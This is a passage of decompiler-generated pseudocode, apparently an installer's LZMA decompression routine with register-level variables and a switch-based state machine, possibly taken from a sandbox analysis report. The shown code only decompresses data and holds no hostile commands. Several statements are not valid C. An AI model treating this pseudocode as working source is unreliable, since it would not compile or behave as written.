                								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                								L139:
                								_t533 =  *(_t613 - 0x84);
                								while(1) {
                									 *(_t613 - 0x88) = _t533;
                									while(1) {
                										L1:
                										_t534 =  *(_t613 - 0x88);
                										if(_t534 > 0x1c) {
                											break;
                										}
                										switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                											case 0:
                												if( *(_t613 - 0x6c) == 0) {
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                												_t534 =  *( *(_t613 - 0x70));
                												if(_t534 > 0xe1) {
                													goto L171;
                												}
                												_t538 = _t534 & 0x000000ff;
                												_push(0x2d);
                												asm("cdq");
                												_pop(_t570);
                												_push(9);
                												_pop(_t571);
                												_t609 = _t538 / _t570;
                												_t540 = _t538 % _t570 & 0x000000ff;
                												asm("cdq");
                												_t604 = _t540 % _t571 & 0x000000ff;
                												 *(_t613 - 0x3c) = _t604;
                												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                												_t612 = (0x300 << _t604 + _t609) + 0x736;
                												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                													L10:
                													if(_t612 == 0) {
                														L12:
                														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                														goto L15;
                													} else {
                														goto L11;
                													}
                													do {
                														L11:
                														_t612 = _t612 - 1;
                														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                													} while (_t612 != 0);
                													goto L12;
                												}
                												if( *(_t613 - 4) != 0) {
                													GlobalFree( *(_t613 - 4));
                												}
                												_t534 = GlobalAlloc(0x40, 0x600); // executed
                												 *(_t613 - 4) = _t534;
                												if(_t534 == 0) {
                													goto L171;
                												} else {
                													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                													goto L10;
                												}
                											case 1:
                												L13:
                												__eflags =  *(_t613 - 0x6c);
                												if( *(_t613 - 0x6c) == 0) {
                													 *(_t613 - 0x88) = 1;
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                												_t45 = _t613 - 0x48;
                												 *_t45 =  *(_t613 - 0x48) + 1;
                												__eflags =  *_t45;
                												L15:
                												if( *(_t613 - 0x48) < 4) {
                													goto L13;
                												}
                												_t546 =  *(_t613 - 0x40);
                												if(_t546 ==  *(_t613 - 0x74)) {
                													L20:
                													 *(_t613 - 0x48) = 5;
                													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                													goto L23;
                												}
                												 *(_t613 - 0x74) = _t546;
                												if( *(_t613 - 8) != 0) {
                													GlobalFree( *(_t613 - 8));
                												}
                												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                												 *(_t613 - 8) = _t534;
                												if(_t534 == 0) {
                													goto L171;
                												} else {
                													goto L20;
                												}
                											case 2:
                												L24:
                												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                												 *(_t613 - 0x84) = 6;
                												 *(_t613 - 0x4c) = _t553;
                												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                												L132:
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											case 3:
                												L21:
                												__eflags =  *(_t613 - 0x6c);
                												if( *(_t613 - 0x6c) == 0) {
                													 *(_t613 - 0x88) = 3;
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												_t67 = _t613 - 0x70;
                												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                												__eflags =  *_t67;
                												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                												L23:
                												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                												if( *(_t613 - 0x48) != 0) {
                													goto L21;
                												}
                												goto L24;
                											case 4:
                												L133:
                												_t531 =  *_t606;
                												_t589 = _t531 & 0x0000ffff;
                												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                												if( *(_t613 - 0xc) >= _t565) {
                													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                													 *(_t613 - 0x40) = 1;
                													_t532 = _t531 - (_t531 >> 5);
                													 *_t606 = _t532;
                												} else {
                													 *(_t613 - 0x10) = _t565;
                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                												}
                												if( *(_t613 - 0x10) >= 0x1000000) {
                													goto L139;
                												}
                											case 5:
                												goto L137;
                											case 6:
                												__edx = 0;
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) = 1;
                													 *(__ebp - 0x84) = 7;
                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                													while(1) {
                														L132:
                														 *(_t613 - 0x54) = _t606;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                												__esi =  *(__ebp - 0x60);
                												__cl = 8;
                												__cl = 8 -  *(__ebp - 0x3c);
                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                												__ecx =  *(__ebp - 0x3c);
                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                												__ecx =  *(__ebp - 4);
                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                												__eflags =  *(__ebp - 0x38) - 4;
                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												if( *(__ebp - 0x38) >= 4) {
                													__eflags =  *(__ebp - 0x38) - 0xa;
                													if( *(__ebp - 0x38) >= 0xa) {
                														_t98 = __ebp - 0x38;
                														 *_t98 =  *(__ebp - 0x38) - 6;
                														__eflags =  *_t98;
                													} else {
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                													}
                												} else {
                													 *(__ebp - 0x38) = 0;
                												}
                												__eflags =  *(__ebp - 0x34) - __edx;
                												if( *(__ebp - 0x34) == __edx) {
                													__ebx = 0;
                													__ebx = 1;
                													goto L61;
                												} else {
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__ecx =  *(__ebp - 8);
                													__ebx = 0;
                													__ebx = 1;
                													__al =  *((intOrPtr*)(__eax + __ecx));
                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                													goto L41;
                												}
                											case 7:
                												__eflags =  *(__ebp - 0x40) - 1;
                												if( *(__ebp - 0x40) != 1) {
                													__eax =  *(__ebp - 0x24);
                													 *(__ebp - 0x80) = 0x16;
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x28);
                													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                													__eax =  *(__ebp - 0x2c);
                													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                													__eax = 0;
                													__eflags =  *(__ebp - 0x38) - 7;
                													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                													__al = __al & 0x000000fd;
                													__eax = (__eflags >= 0) - 1 + 0xa;
                													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x664;
                													__eflags = __eax;
                													 *(__ebp - 0x58) = __eax;
                													goto L69;
                												}
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 8;
                												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                												while(1) {
                													L132:
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											case 8:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xa;
                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                												} else {
                													__eax =  *(__ebp - 0x38);
                													__ecx =  *(__ebp - 4);
                													__eax =  *(__ebp - 0x38) + 0xf;
                													 *(__ebp - 0x84) = 9;
                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                												}
                												while(1) {
                													L132:
                													 *(_t613 - 0x54) = _t606;
                													goto L133;
                												}
                											case 9:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													goto L89;
                												}
                												__eflags =  *(__ebp - 0x60);
                												if( *(__ebp - 0x60) == 0) {
                													goto L171;
                												}
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                												__eflags = _t259;
                												0 | _t259 = _t259 + _t259 + 9;
                												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                												goto L76;
                											case 0xa:
                												goto L0;
                											case 0xb:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__ecx =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x20);
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												} else {
                													__eax =  *(__ebp - 0x24);
                												}
                												__ecx =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												goto L88;
                											case 0xc:
                												L99:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xc;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t334 = __ebp - 0x70;
                												 *_t334 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t334;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												__eax =  *(__ebp - 0x2c);
                												goto L101;
                											case 0xd:
                												L37:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xd;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t122 = __ebp - 0x70;
                												 *_t122 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t122;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L39:
                												__eax =  *(__ebp - 0x40);
                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                													goto L48;
                												}
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													goto L54;
                												}
                												L41:
                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                												__ecx =  *(__ebp - 0x58);
                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                												 *(__ebp - 0x48) = __eax;
                												__eax = __eax + 1;
                												__eax = __eax << 8;
                												__eax = __eax + __ebx;
                												__esi =  *(__ebp - 0x58) + __eax * 2;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edx = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													 *(__ebp - 0x40) = 1;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													__ebx = __ebx + __ebx + 1;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edx;
                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L39;
                												} else {
                													goto L37;
                												}
                											case 0xe:
                												L46:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xe;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t156 = __ebp - 0x70;
                												 *_t156 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t156;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												while(1) {
                													L48:
                													__eflags = __ebx - 0x100;
                													if(__ebx >= 0x100) {
                														break;
                													}
                													__eax =  *(__ebp - 0x58);
                													__edx = __ebx + __ebx;
                													__ecx =  *(__ebp - 0x10);
                													__esi = __edx + __eax;
                													__ecx =  *(__ebp - 0x10) >> 0xb;
                													__ax =  *__esi;
                													 *(__ebp - 0x54) = __esi;
                													__edi = __ax & 0x0000ffff;
                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                													__eflags =  *(__ebp - 0xc) - __ecx;
                													if( *(__ebp - 0xc) >= __ecx) {
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                														__cx = __ax;
                														_t170 = __edx + 1; // 0x1
                														__ebx = _t170;
                														__cx = __ax >> 5;
                														__eflags = __eax;
                														 *__esi = __ax;
                													} else {
                														 *(__ebp - 0x10) = __ecx;
                														0x800 = 0x800 - __edi;
                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                														__ebx = __ebx + __ebx;
                														 *__esi = __cx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														continue;
                													} else {
                														goto L46;
                													}
                												}
                												L54:
                												_t173 = __ebp - 0x34;
                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                												__eflags =  *_t173;
                												goto L55;
                											case 0xf:
                												L58:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xf;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t203 = __ebp - 0x70;
                												 *_t203 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t203;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L60:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													L55:
                													__al =  *(__ebp - 0x44);
                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                													goto L56;
                												}
                												L61:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t217 = __edx + 1; // 0x1
                													__ebx = _t217;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L60;
                												} else {
                													goto L58;
                												}
                											case 0x10:
                												L109:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x10;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t365 = __ebp - 0x70;
                												 *_t365 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t365;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												goto L111;
                											case 0x11:
                												goto L69;
                											case 0x12:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 0x58);
                													 *(__ebp - 0x84) = 0x13;
                													__esi =  *(__ebp - 0x58) + 2;
                													while(1) {
                														L132:
                														 *(_t613 - 0x54) = _t606;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x4c);
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												__eflags = __eax;
                												__eax =  *(__ebp - 0x58) + __eax + 4;
                												goto L130;
                											case 0x13:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													_t469 = __ebp - 0x58;
                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                													__eflags =  *_t469;
                													 *(__ebp - 0x30) = 0x10;
                													 *(__ebp - 0x40) = 8;
                													L144:
                													 *(__ebp - 0x7c) = 0x14;
                													goto L145;
                												}
                												__eax =  *(__ebp - 0x4c);
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												 *(__ebp - 0x30) = 8;
                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                												L130:
                												 *(__ebp - 0x58) = __eax;
                												 *(__ebp - 0x40) = 3;
                												goto L144;
                											case 0x14:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                												__eax =  *(__ebp - 0x80);
                												 *(_t613 - 0x88) = _t533;
                												goto L1;
                											case 0x15:
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xb;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                												goto L120;
                											case 0x16:
                												__eax =  *(__ebp - 0x30);
                												__eflags = __eax - 4;
                												if(__eax >= 4) {
                													_push(3);
                													_pop(__eax);
                												}
                												__ecx =  *(__ebp - 4);
                												 *(__ebp - 0x40) = 6;
                												__eax = __eax << 7;
                												 *(__ebp - 0x7c) = 0x19;
                												 *(__ebp - 0x58) = __eax;
                												goto L145;
                											case 0x17:
                												L145:
                												__eax =  *(__ebp - 0x40);
                												 *(__ebp - 0x50) = 1;
                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                												goto L149;
                											case 0x18:
                												L146:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x18;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t484 = __ebp - 0x70;
                												 *_t484 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t484;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L148:
                												_t487 = __ebp - 0x48;
                												 *_t487 =  *(__ebp - 0x48) - 1;
                												__eflags =  *_t487;
                												L149:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__ecx =  *(__ebp - 0x40);
                													__ebx =  *(__ebp - 0x50);
                													0 = 1;
                													__eax = 1 << __cl;
                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                													__eax =  *(__ebp - 0x7c);
                													 *(__ebp - 0x44) = __ebx;
                													while(1) {
                														 *(_t613 - 0x88) = _t533;
                														goto L1;
                													}
                												}
                												__eax =  *(__ebp - 0x50);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                												__eax =  *(__ebp - 0x58);
                												__esi = __edx + __eax;
                												 *(__ebp - 0x54) = __esi;
                												__ax =  *__esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													__cx = __ax >> 5;
                													__eax = __eax - __ecx;
                													__edx = __edx + 1;
                													__eflags = __edx;
                													 *__esi = __ax;
                													 *(__ebp - 0x50) = __edx;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L148;
                												} else {
                													goto L146;
                												}
                											case 0x19:
                												__eflags = __ebx - 4;
                												if(__ebx < 4) {
                													 *(__ebp - 0x2c) = __ebx;
                													L119:
                													_t393 = __ebp - 0x2c;
                													 *_t393 =  *(__ebp - 0x2c) + 1;
                													__eflags =  *_t393;
                													L120:
                													__eax =  *(__ebp - 0x2c);
                													__eflags = __eax;
                													if(__eax == 0) {
                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                														goto L170;
                													}
                													__eflags = __eax -  *(__ebp - 0x60);
                													if(__eax >  *(__ebp - 0x60)) {
                														goto L171;
                													}
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                													__eax =  *(__ebp - 0x30);
                													_t400 = __ebp - 0x60;
                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                													__eflags =  *_t400;
                													goto L123;
                												}
                												__ecx = __ebx;
                												__eax = __ebx;
                												__ecx = __ebx >> 1;
                												__eax = __ebx & 0x00000001;
                												__ecx = (__ebx >> 1) - 1;
                												__al = __al | 0x00000002;
                												__eax = (__ebx & 0x00000001) << __cl;
                												__eflags = __ebx - 0xe;
                												 *(__ebp - 0x2c) = __eax;
                												if(__ebx >= 0xe) {
                													__ebx = 0;
                													 *(__ebp - 0x48) = __ecx;
                													L102:
                													__eflags =  *(__ebp - 0x48);
                													if( *(__ebp - 0x48) <= 0) {
                														__eax = __eax + __ebx;
                														 *(__ebp - 0x40) = 4;
                														 *(__ebp - 0x2c) = __eax;
                														__eax =  *(__ebp - 4);
                														__eax =  *(__ebp - 4) + 0x644;
                														__eflags = __eax;
                														L108:
                														__ebx = 0;
                														 *(__ebp - 0x58) = __eax;
                														 *(__ebp - 0x50) = 1;
                														 *(__ebp - 0x44) = 0;
                														 *(__ebp - 0x48) = 0;
                														L112:
                														__eax =  *(__ebp - 0x40);
                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                															_t391 = __ebp - 0x2c;
                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                															__eflags =  *_t391;
                															goto L119;
                														}
                														__eax =  *(__ebp - 0x50);
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                														__eax =  *(__ebp - 0x58);
                														__esi = __edi + __eax;
                														 *(__ebp - 0x54) = __esi;
                														__ax =  *__esi;
                														__ecx = __ax & 0x0000ffff;
                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                														__eflags =  *(__ebp - 0xc) - __edx;
                														if( *(__ebp - 0xc) >= __edx) {
                															__ecx = 0;
                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                															__ecx = 1;
                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                															__ebx = 1;
                															__ecx =  *(__ebp - 0x48);
                															__ebx = 1 << __cl;
                															__ecx = 1 << __cl;
                															__ebx =  *(__ebp - 0x44);
                															__ebx =  *(__ebp - 0x44) | __ecx;
                															__cx = __ax;
                															__cx = __ax >> 5;
                															__eax = __eax - __ecx;
                															__edi = __edi + 1;
                															__eflags = __edi;
                															 *(__ebp - 0x44) = __ebx;
                															 *__esi = __ax;
                															 *(__ebp - 0x50) = __edi;
                														} else {
                															 *(__ebp - 0x10) = __edx;
                															0x800 = 0x800 - __ecx;
